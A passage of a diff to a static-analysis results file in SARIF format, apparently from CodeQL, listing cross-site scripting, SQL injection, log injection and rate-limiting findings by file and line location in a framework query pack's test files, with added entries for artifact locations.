: "documen ... .search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 11, - "startColumn" : 20, - "endColumn" : 25 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/xss", - "rule" : { - "id" : "js/xss", - "index" : 34, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 19, - "startColumn" : 20, - "endColumn" : 26 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "c51cf11a085c01f4:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "documen ... .search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 18, - "endColumn" : 45 - } - }, - "message" : { - "text" : "jQuery. ... (value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 19, - "startColumn" : 20, - "endColumn" : 26 - } - }, - "message" : { - "text" : "value1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/xss", - "rule" : { - "id" : "js/xss", - "index" : 34, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 27, - "startColumn" : 20, - "endColumn" : 26 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "e309bf8540256a05:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 25, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "documen ... .search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 25, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 26, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 26, - "startColumn" : 18, - "endColumn" : 45 - } - }, - "message" : { - "text" : "jQuery. ... (value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 26, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 27, - "startColumn" : 20, - "endColumn" : 26 - } - }, - "message" : { - "text" : "value1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 25, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] }, { - "ruleId" : "js/missing-rate-limiting", - "rule" : { - "id" : "js/missing-rate-limiting", - "index" : 68, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "This route handler performs [a database access](1), but is not rate-limited." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 40, - "startColumn" : 25, - "endLine" : 44, - "endColumn" : 8 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "ac6d3bdd3d52ea9b:1", - "primaryLocationStartColumnFingerprint" : "18" - }, - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 9, - "endLine" : 43, - "endColumn" : 11 - } - }, - "message" : { - "text" : "a database access" - } - } ] - }, { - "ruleId" : "js/sql-injection", - "rule" : { - "id" : "js/sql-injection", - "index" : 78, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "This query string depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 20, - "endColumn" : 40 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "4fc3122b51f477a1:1", - "primaryLocationStartColumnFingerprint" : "11" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 20, - "endColumn" : 40 - } - }, - "message" : { - "text" : "req2.params.category" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 20, - "endColumn" : 40 - } - }, - "message" : { - "text" : "req2.params.category" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 20, - "endColumn" : 40 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 112 + } }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 26, - "startColumn" : 19, - "endColumn" : 36 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "ccc6f77c65eccb45:1", - "primaryLocationStartColumnFingerprint" : "12" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 34, - "endColumn" : 54 - } - }, - "message" : { - "text" : "req2.params.category" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 13, - "endColumn" : 54 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 26, - "startColumn" : 32, - "endColumn" : 36 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 26, - "startColumn" : 19, - "endColumn" : 36 - } - }, - "message" : { - "text" : "\"console:\" + book" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 34, - "endColumn" : 54 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 113 + } }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 7, - "startColumn" : 18, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "be9a18716e55d497:1", - "primaryLocationStartColumnFingerprint" : "13" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 39 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 7, - "startColumn" : 18, - "endColumn" : 41 - } - }, - "message" : { - "text" : "`[INFO] ... value}`" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + } }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 15, - "startColumn" : 18, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "be9a18716e55d497:2", - "primaryLocationStartColumnFingerprint" : "13" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "req.url" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 13, - "endColumn" : 37 - } - }, - "message" : { - "text" : "url.par ... , true)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 9, - "endColumn" : 37 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 18 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 24 - } - }, - "message" : { - "text" : "q.query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "q.query.username" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 9, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 15, - "startColumn" : 34, - "endColumn" : 39 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 15, - "startColumn" : 18, - "endColumn" : 41 - } - }, - "message" : { - "text" : "`[INFO] ... value}`" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 115 + } }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 24, - "startColumn" : 18, - "endColumn" : 42 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "e197b363f9dc3962:1", - "primaryLocationStartColumnFingerprint" : "13" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "req.url" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 13, - "endColumn" : 37 - } - }, - "message" : { - "text" : "url.par ... , true)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 9, - "endColumn" : 37 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 18 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 24 - } - }, - "message" : { - "text" : "q.query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "q.query.username" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 9, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 18, - "endColumn" : 45 - } - }, - "message" : { - "text" : "jQuery. ... (value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 24, - "startColumn" : 34, - "endColumn" : 40 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 24, - "startColumn" : 18, - "endColumn" : 42 - } - }, - "message" : { - "text" : "`[INFO] ... alue1}`" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 116 + } }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - }, - "region" : { - "startLine" : 5, - "startColumn" : 17, - "endColumn" : 33 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "45280b24f3d81287:1", - "primaryLocationStartColumnFingerprint" : "12" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - }, - "region" : { - "startLine" : 5, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "req.responseText" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - }, - "region" : { - "startLine" : 5, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "req.responseText" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - }, - "region" : { - "startLine" : 5, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 117 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 5, - "startColumn" : 27, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "92dbc37bdafc7694:1", - "primaryLocationStartColumnFingerprint" : "22" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 